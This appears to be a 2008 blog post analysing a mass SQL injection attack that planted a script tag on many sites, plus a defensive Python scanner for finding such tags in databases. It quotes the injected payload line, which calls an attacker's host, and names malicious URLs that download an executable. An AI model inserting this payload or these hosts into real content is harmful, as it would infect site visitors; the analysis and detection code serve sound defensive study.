
Kisswow SQL Injection Attack

Some initial research on the Kisswow SQL injection attack.

If you search Google for 'kisswow' or 'ririwow', you will see that a bunch of web sites were hit with a SQL injection attack sometime recently. These are part of the same attack. I wanted to post some initial analysis I did on this so that others might benefit. This analysis is pretty tentative, but I'm hoping that others can either expand upon or correct it as necessary.

IN WHAT FOLLOWS, DO NOT DOWNLOAD THE SCRIPTS UNLESS YOU KNOW WHAT YOU'RE DOING! YOU WILL END UP WITH MALWARE ON YOUR MACHINE. I used lynx to download the scripts so that I could see them without causing any problems.

So it looks like the basic idea behind the attack is to use SQL injection to insert malicious JavaScript into databases of public-facing sites. The web application then displays the malicious script on the web and people download it. If you're on Windows, then the download can cause problems for you.

In this case the script in question is the following:

*** DO NOT DOWNLOAD THIS MALICIOUS SCRIPT! ***
<script src=http://www.kisswow.com.cn/m.js></script>

This script creates an invisible iframe on your web page that in turn downloads an HTML page at the following URL:

*** DO NOT VISIT THIS MALICIOUS URL! ***
www.ririwow.cn/index.htm

The page just mentioned includes three iframes and some indelicate words about France and CNN:

F*** FRANCE! F*** CNN! I WILL ATTACK you ALWAYS ! IF YOU WANT TO SAY SOMETHING . PLEASE SEND EMAIL TO kiss117276@163.com

Here's what the iframes appear to be doing:

iframe #1 at MALICIOUS URL www.ririwow.cn/14.htm: Uses Microsoft.XMLHTTP to download a MALICIOUS executable from http://dj.jueduizuan.com/ri.exe into your temp directory (the directory named by your TMP environment variable). I have no idea what ri.exe does, as I did not want to run it on my machine.

iframe #2 at MALICIOUS URL www.ririwow.cn/real.htm: Looks like some kind of RealPlayer exploit designed to annoy the end user. I'm just guessing from the source code but it looks like it plays a video of a clock and plays a lot of annoying sounds, including a NetMeeting test sound, a buzzing bee sound, tada.wav, chimes.wav and LoopyMusic.wav.

iframe #3 at MALICIOUS URL www.ririwow.cn/07004.htm: Looks like it flashes a bunch of colors on the screen but I can't tell for sure.

Anyway, a lot of sites were hit by this one so I wanted to put some initial research out there. Elaborations/corrections welcome.
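As an added example (not code from the original post), here is a small Python scan written from the defender's side: it walks stored text values looking for the kind of injected external script tag quoted above, marks hosts named in this post as known-bad, and shows that HTML-escaping on output leaves a stored tag inert. The table and column names and the sample rows are constructed for illustration.

```python
import html
import re

# Hosts quoted in the post above (the injected script and the iframe targets).
KNOWN_BAD_HOSTS = {"www.kisswow.com.cn", "www.ririwow.cn", "dj.jueduizuan.com"}

# Matches <script src=...> whether or not the URL is quoted; the payload seen
# in this attack used an unquoted src attribute.
SCRIPT_SRC_RE = re.compile(
    r"<script[^>]*\bsrc\s*=\s*[\"']?(?P<url>https?://[^\s\"'>]+)",
    re.IGNORECASE)


def find_injected_scripts(text):
    """Return every external script URL embedded in a stored text value."""
    return [m.group("url") for m in SCRIPT_SRC_RE.finditer(text)]


def host_of(url):
    """Extract the host part of an http(s) URL."""
    return url.split("//", 1)[1].split("/", 1)[0].lower()


def scan_rows(rows):
    """rows: iterable of (table, column, pk, value). Returns findings."""
    findings = []
    for table, column, pk, value in rows:
        for url in find_injected_scripts(value or ""):
            severity = "known-bad" if host_of(url) in KNOWN_BAD_HOSTS else "review"
            findings.append((table, column, pk, url, severity))
    return findings


def render_safely(value):
    """Output encoding: a stored tag becomes plain text instead of markup."""
    return html.escape(value, quote=True)


# Constructed sample rows mimicking what an injected content table might hold.
SAMPLE_ROWS = [
    ("articles", "title", 1, "Welcome to our site"),
    ("articles", "body", 2, "Hello world<script src=http://www.kisswow.com.cn/m.js></script>"),
    ("comments", "text", 3, '<script src="https://cdn.example.invalid/lib.js"></script>'),
]

if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print(finding)
    print(render_safely(SAMPLE_ROWS[1][3]))
```

Flagging on `<script` alone is a first pass; a real cleanup should also look for stored `<iframe>` tags and event-handler attributes, and the fix is parameterized queries plus output encoding, not just removing the rows.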


Comments (4)

Some useful links:

http://blog.wired.com/monkeybites/2008/04/microsoft-datab.html

http://hackademix.net/2008/04/26/mass-attack-faq/
By Willie Wheeler on May 12, 2008 at 12:52 PM PDT
Another interesting piece of information regarding the m.js script. It checks to see if your browser language is set to Chinese, and if not then it sends you to the ririwow.cn site.

See http://isc.sans.org/ for details.
By Willie Wheeler on May 14, 2008 at 1:33 PM PDT


Copyright © 2008 Wheeler Software, LLC.